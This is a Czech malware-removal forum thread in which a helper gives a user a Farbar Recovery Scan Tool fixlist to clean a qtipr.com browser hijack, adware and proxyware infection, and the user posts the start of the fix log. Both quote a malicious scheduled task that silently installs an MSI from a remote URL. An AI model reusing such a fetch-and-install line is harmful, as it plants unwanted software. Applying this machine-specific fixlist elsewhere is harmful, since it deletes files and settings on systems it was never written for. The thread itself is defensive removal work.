qtipr.com

Zpráva

jarmyl · #1 Příspěvek od **jarmyl** » 17 bře 2017 15:35

mám znovuobjevující se záložku s adresou http://www.qutipr.com v prohlížeči internetu (chrome) a nemohu se jí zbavit. zkoušel jsem nainstaloval nějakou pitomost, a přitom se stáhly navíc programy o kterých jsem nevěděl - objevil se mi v kontextové nabídce OS "rozsypaný čaj" což mě vyděsilo, takže jsem dohledal nějaké návody a pokusil se řešit na vlastní pěst - mechanicky mazal pravděpodobně dotčené adresáře, ale tohle nezmizelo. v příloze zasílám radši více logů. děkuji za pomoc.

#2 Příspěvek od **altrok** » 17 bře 2017 16:09

Krasny den Vam preju

Jedna se o soukromy nebo pracovni PC?

V ramci cisteni Vam budou vyprazdneny docasne adresare (vysypani Kose a tempu, vyprazdneni cache prohlizecu apod.).

Vyzkousejte nejprve manualne vytvorit bod obnoveni.

jarmyl · #3 Příspěvek od **jarmyl** » 17 bře 2017 16:19

to není problém !

#4 Příspěvek od **altrok** » 17 bře 2017 16:33

Jedna se o soukromy nebo pracovni PC?

Vyborne. Bod obnoveni, doufam, nebude potreba, ale pro jistotu. Pocitac je krasne zapleveleny.

Do Poznamkoveho bloku (Start -> spustit -> notepad) zkopirujte obsah bileho pole
ulozte na plochu jako fixlist (Typ souboru: Textovy dokument)
znovu spustte FRST a kliknete na Fix

po restartu bude na plose ulozen fixlog, jehoz obsah vlozte do pristi odpovedi

Kód: Vybrat vše

Start
CreateRestorePoint:
CloseProcesses:
File: C:\Program Files (x86)\Qumase\veraph.exe
Folder: C:\Program Files (x86)\Qumase
C:\Program Files (x86)\Qumase
File: C:\Program Files (x86)\Narech Client\local64spl.dll
Folder: C:\Program Files (x86)\Narech Client
C:\Program Files (x86)\Narech Client
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2016\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Y\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Y\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2016\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2016\Inventor Server\Bin\TestServer.dll => No File
Task: {05891592-DA8C-4830-A4CE-8996EEC5D8F7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {08B1BFE0-A287-440E-ABF5-97102858AAAC} - System32\Tasks\Online Application Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe  <==== ATTENTION
Task: {15AF3504-5586-449C-B0C2-1B39FC7ECBC9} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe [2017-02-15] (Microleaves) <==== ATTENTION
Task: {1ED60EC4-DB2C-43AA-A9E5-4034852D6958} - System32\Tasks\Online Application v2 => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe  <==== ATTENTION
Task: {22202710-1AF7-40F8-A659-8D97D8F517C1} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe  <==== ATTENTION
Task: {269CB3E0-15C8-49AE-AD53-F2068CF54A1F} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe  <==== ATTENTION
Task: {2BBF7288-3E12-4665-BEA3-1ED07E3A65D0} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe  <==== ATTENTION
Task: {2D22FEB1-8880-4B50-98D7-BA9EE8C4D598} - System32\Tasks\Online Application => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe  <==== ATTENTION
Task: {2F4108A1-4B17-4E62-891E-C884B23341DA} - System32\Tasks\Online Application Updater => C:\Program Files (x86)\Microleaves\Online.io Application\Online Application Updater.exe [2017-02-15] (Microleaves) <==== ATTENTION
Task: {30FD3AAB-EDB1-406C-8B7F-E9DAA645B2F2} - System32\Tasks\Leputy => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SAMSUNGXMZ7TD512HAGM-000L1_S151NYADA00095&v=20170312 /q <==== ATTENTION
Task: {3D4C177E-EDF3-4144-9E73-BCAA023F6B47} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe  <==== ATTENTION
Task: {3E9D7AA7-C043-4FB6-94E4-0928BC05ABB0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3F902269-43AB-485A-8AE0-950ABAB1FF27} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe  <==== ATTENTION
Task: {4CEE9A2C-3FE5-48C6-992C-4BE15D1E2AF5} - System32\Tasks\Online Application v2 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe  <==== ATTENTION
Task: {5461E4F9-10F8-4EAB-BBFE-4CB3FB0547C0} - System32\Tasks\Narech Client => C:\Program Files (x86)\Qumase\veraph.exe 
Task: {55DACCAB-AEEE-4E6C-86F1-26ABE71B00E5} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe  <==== ATTENTION
Task: {594E1451-AFDB-4287-B1B3-D18EB2E0BF2E} - System32\Tasks\Online Application v209 => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe  <==== ATTENTION
Task: {5C4EA77F-8CF5-41DB-B883-F1EA1642C5D4} - System32\Tasks\Online Application Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe  <==== ATTENTION
Task: {60A433A8-9F5A-4026-8454-75EE1943CDC9} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {637E2C13-5027-47A7-9107-E3324F1213E8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {687ECE0D-CF66-42BC-9951-3C12D3BC5EC2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {6E832262-BAD8-40D2-8D28-EE2E7D2E5622} - System32\Tasks\{E6D23253-1BC6-4DC7-972F-F9F2F5596439} => pcalua.exe -a C:\Users\Y\AppData\Roaming\Kubity\VRSkope\uninstaller.exe -c /uninstall
Task: {70412D1E-3AB2-41BF-A076-334CC2DCD958} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {7D21B362-DCCB-4E9F-98C3-A48D802EB6A5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {7FB0B89D-2E9D-4C77-B67D-BF6202830584} - \Lenovo\Lenovo Service Bridge\S-1-5-21-732140370-2414468103-320680840-1003 -> No File <==== ATTENTION
Task: {8232A377-31D7-44A1-BEBD-5D432EB975C9} - System32\Tasks\KuaiZip_Update => C:\PROGRA~1\88D7~1\X86\Update.exe  <==== ATTENTION
Task: {8960C2FC-FDF0-434A-A0B0-120144BAF5AD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {97DC44DE-44A4-4F58-BFBF-538BBA4C7AC4} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe  <==== ATTENTION
Task: {ABA63C90-4A6A-46DA-B08D-30E3737A795A} - System32\Tasks\PC SpeedUp Service Deactivator => C:\Program Files (x86)\Zrychleni Pocitace\PCSUSD.exe  <==== ATTENTION
Task: {B48554ED-C19D-44C8-B156-0560568E355A} - System32\Tasks\Online Application v209 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe  <==== ATTENTION
Task: {B88028EE-3EF2-4580-87C4-6C9F1C9D131C} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe  <==== ATTENTION
Task: {C37E0EB4-7A29-41AF-A618-EE8EADD5C406} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe  <==== ATTENTION
Task: {C94C4D52-6DEC-4FAE-B24D-C774982AB815} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe  <==== ATTENTION
Task: {CC885471-1F4C-4BF4-84B7-2D7DFC153F9D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {D57279A9-985E-41AB-A6B9-C663392DA97D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {DD5F2E28-31C3-48D2-B3B1-9E15CA95A440} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {EBA869B9-6C89-4659-BF10-1BC8EB3D6070} - System32\Tasks\Online Application v2 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe  <==== ATTENTION
Task: {EF2A4DCC-19C7-4CB0-98B5-467A61F967BC} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {FDA13CB3-67CD-49A6-A582-88C1957EE1BD} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe  <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1cfee32ff15bdf1.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-732140370-2414468103-320680840-1003Core.job => C:\Users\Y\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-732140370-2414468103-320680840-1003UA.job => C:\Users\Y\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Online Application Updater.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online Application Updater.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v2 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v2 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v2.job => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job => C:\Program Files (x86)\Zrychleni Pocitace\PCSUSD.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange Updater.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job =>  <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job =>  <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
ShortcutWithArgument: C:\Users\Y\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
ShortcutWithArgument: C:\Users\Y\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [101778]
AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [1498914]
AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1223458]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\Temp:296515B3 [352]
AlternateDataStreams: C:\ProgramData\Temp:4FC01C57 [134]
AlternateDataStreams: C:\ProgramData\Temp:78F63A0E [189]
AlternateDataStreams: C:\ProgramData\Temp:DC9AE426 [175]
AlternateDataStreams: C:\ProgramData\Temp:EC14014D [201]
HKU\S-1-5-21-732140370-2414468103-320680840-1003\...\Policies\Explorer: [] 
HKU\S-1-5-18\...\Run: [] => [X]
HKLM\...\Providers\vr93xp24: C:\Program Files (x86)\Narech Client\local64spl.dll
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll -> No File
GroupPolicy: Restriction <======= ATTENTION
CHR Extension: (easychrome) - C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk [2017-03-12]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S2 UCBrowserSvc; "C:\Program Files (x86)\UCBrowser\Application\UCService.exe" [X]
R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
S2 KuaiZipDrive; \??\C:\WINDOWS\system32\drivers\KuaiZipDrive.sys [X]
2017-03-16 09:21 - 2017-03-16 09:22 - 00000000 ____D C:\Users\Y\AppData\Roaming\Bajipyhcch
2017-03-16 09:21 - 2017-03-16 09:22 - 00000000 ____D C:\Users\Y\AppData\Local\Vilsyghewok
2017-03-16 09:21 - 2017-03-16 09:21 - 00006062 _____ C:\WINDOWS\System32\Tasks\Narech Client
2017-03-13 14:49 - 2017-03-13 14:49 - 00000000 ____D C:\ProgramData\Microleaves
2017-03-12 14:48 - 2017-03-17 14:48 - 00000000 ____D C:\Program Files (x86)\UCBrowser
2017-03-12 14:48 - 2017-03-12 15:41 - 00000000 ____D C:\Users\Y\AppData\Roaming\Fevitionpltige
2017-03-12 14:48 - 2017-03-12 15:26 - 00000000 ____D C:\Program Files (x86)\Saaleruherty Core
2017-03-12 14:48 - 2017-03-12 14:48 - 00006088 _____ C:\WINDOWS\System32\Tasks\Saaleruherty Core
2017-03-12 14:48 - 2017-03-12 14:48 - 00005116 _____ C:\WINDOWS\System32\Tasks\Leputy
2017-03-12 14:48 - 2017-03-12 14:48 - 00003476 _____ C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater
2017-03-12 14:48 - 2017-03-12 14:48 - 00003474 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater
2017-03-12 14:48 - 2017-03-12 14:48 - 00002624 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdaterCore
2017-03-12 14:48 - 2017-03-12 14:48 - 00000464 _____ C:\WINDOWS\Tasks\UCBrowserUpdater.job
2017-03-12 14:48 - 2017-03-12 14:48 - 00000300 _____ C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job
2017-03-12 14:48 - 2017-03-12 14:48 - 00000000 ____D C:\Users\Y\AppData\Local\UCBrowser
2017-03-12 14:48 - 2017-03-12 14:48 - 00000000 ____D C:\Users\Y\AppData\Local\Dieshfergerent
2017-03-12 14:48 - 2017-03-12 14:48 - 00000000 ____D C:\Program Files (x86)\Figasy
2017-03-12 14:47 - 2017-03-12 15:39 - 00000000 __SHD C:\Users\Y\AppData\Local\svchost
2017-03-12 14:47 - 2017-03-12 14:48 - 00000000 ____D C:\Users\Y\AppData\Roaming\UCChannel
2017-03-12 14:47 - 2017-03-12 14:47 - 00003510 _____ C:\WINDOWS\System32\Tasks\KuaiZip_Update
2017-03-12 14:47 - 2017-03-12 14:47 - 00000893 _____ C:\Users\Y\AppData\Roaming\Microsoft\Windows\Start Menu\żěŃą.lnk
2017-03-12 14:47 - 2017-03-12 14:47 - 00000000 ____D C:\Users\Y\AppData\Roaming\Softlink
2017-03-12 14:47 - 2017-03-12 14:47 - 00000000 ____D C:\Users\Y\AppData\Roaming\KuaiZip
2017-03-12 14:46 - 2017-03-12 14:52 - 00000410 _____ C:\WINDOWS\Tasks\Online Application Updater.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000396 ____H C:\WINDOWS\Tasks\Traffic Exchange Updater.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000376 _____ C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000364 _____ C:\WINDOWS\Tasks\Online Application v209.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000364 _____ C:\WINDOWS\Tasks\Online Application v209 Guardian.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000364 _____ C:\WINDOWS\Tasks\Online Application v209 Guard.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Online Application v2.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Online Application v2 Guardian.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Online Application v2 Guard.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000344 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000344 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000344 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job
2017-03-12 14:46 - 2017-03-12 14:46 - 00003722 _____ C:\WINDOWS\System32\Tasks\Online Application Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003716 _____ C:\WINDOWS\System32\Tasks\Online Application Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003708 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003704 _____ C:\WINDOWS\System32\Tasks\Online Application
2017-03-12 14:46 - 2017-03-12 14:46 - 00003702 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003690 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange
2017-03-12 14:46 - 2017-03-12 14:46 - 00003304 _____ C:\WINDOWS\System32\Tasks\Online Application Updater
2017-03-12 14:46 - 2017-03-12 14:46 - 00003284 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Updater
2017-03-12 14:46 - 2017-03-12 14:46 - 00003270 _____ C:\WINDOWS\System32\Tasks\Online Application v209 Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003264 _____ C:\WINDOWS\System32\Tasks\Online Application v209 Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003256 _____ C:\WINDOWS\System32\Tasks\Online Application v2 Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003252 _____ C:\WINDOWS\System32\Tasks\Online Application v209
2017-03-12 14:46 - 2017-03-12 14:46 - 00003250 _____ C:\WINDOWS\System32\Tasks\Online Application v2 Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003246 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 3
2017-03-12 14:46 - 2017-03-12 14:46 - 00003246 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 2
2017-03-12 14:46 - 2017-03-12 14:46 - 00003246 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 1
2017-03-12 14:46 - 2017-03-12 14:46 - 00003238 _____ C:\WINDOWS\System32\Tasks\Online Application v2
2017-03-12 14:46 - 2017-03-12 14:46 - 00003232 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 3
2017-03-12 14:46 - 2017-03-12 14:46 - 00003232 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 2
2017-03-12 14:46 - 2017-03-12 14:46 - 00003232 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 1
2017-03-12 14:46 - 2017-03-12 14:46 - 00002834 _____ C:\WINDOWS\System32\Tasks\PC SpeedUp Service Deactivator
2017-03-12 14:46 - 2017-03-12 14:46 - 00000000 ____D C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
2017-03-12 14:46 - 2017-03-12 14:46 - 00000000 ____D C:\Program Files (x86)\Microleaves
2017-03-12 14:45 - 2017-03-12 14:46 - 00000000 ____D C:\Users\Y\AppData\Roaming\Microleaves
2017-03-12 14:45 - 2017-03-12 14:45 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-03-12 14:45 - 2017-03-12 14:45 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
CMD: dir "C:\Windows\Inf" /AD
CMD: dir "C:\PROGRA~1"
CMD: dir "C:\PROGRA~2"
CMD: dir "C:\PROGRA~3"
CMD: dir "%localappdata%"
CMD: dir "%appdata%"
Hosts:
EmptyTemp:
End

jarmyl · #5 Příspěvek od **jarmyl** » 17 bře 2017 17:05

Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by Y (17-03-2017 16:55:17) Run:1
Running from C:\Users\Y\Desktop
Loaded Profiles: Y (Available Profiles: Y & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
File: C:\Program Files (x86)\Qumase\veraph.exe
Folder: C:\Program Files (x86)\Qumase
C:\Program Files (x86)\Qumase
File: C:\Program Files (x86)\Narech Client\local64spl.dll
Folder: C:\Program Files (x86)\Narech Client
C:\Program Files (x86)\Narech Client
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2016\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Y\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Y\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2016\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2016\Inventor Server\Bin\TestServer.dll => No File
Task: {05891592-DA8C-4830-A4CE-8996EEC5D8F7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {08B1BFE0-A287-440E-ABF5-97102858AAAC} - System32\Tasks\Online Application Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe <==== ATTENTION
Task: {15AF3504-5586-449C-B0C2-1B39FC7ECBC9} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe [2017-02-15] (Microleaves) <==== ATTENTION
Task: {1ED60EC4-DB2C-43AA-A9E5-4034852D6958} - System32\Tasks\Online Application v2 => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: {22202710-1AF7-40F8-A659-8D97D8F517C1} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
Task: {269CB3E0-15C8-49AE-AD53-F2068CF54A1F} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {2BBF7288-3E12-4665-BEA3-1ED07E3A65D0} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
Task: {2D22FEB1-8880-4B50-98D7-BA9EE8C4D598} - System32\Tasks\Online Application => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe <==== ATTENTION
Task: {2F4108A1-4B17-4E62-891E-C884B23341DA} - System32\Tasks\Online Application Updater => C:\Program Files (x86)\Microleaves\Online.io Application\Online Application Updater.exe [2017-02-15] (Microleaves) <==== ATTENTION
Task: {30FD3AAB-EDB1-406C-8B7F-E9DAA645B2F2} - System32\Tasks\Leputy => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SAMSUNGXMZ7TD512HAGM-000L1_S151NYADA00095&v=20170312 /q <==== ATTENTION
Task: {3D4C177E-EDF3-4144-9E73-BCAA023F6B47} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: {3E9D7AA7-C043-4FB6-94E4-0928BC05ABB0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3F902269-43AB-485A-8AE0-950ABAB1FF27} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {4CEE9A2C-3FE5-48C6-992C-4BE15D1E2AF5} - System32\Tasks\Online Application v2 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: {5461E4F9-10F8-4EAB-BBFE-4CB3FB0547C0} - System32\Tasks\Narech Client => C:\Program Files (x86)\Qumase\veraph.exe
Task: {55DACCAB-AEEE-4E6C-86F1-26ABE71B00E5} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
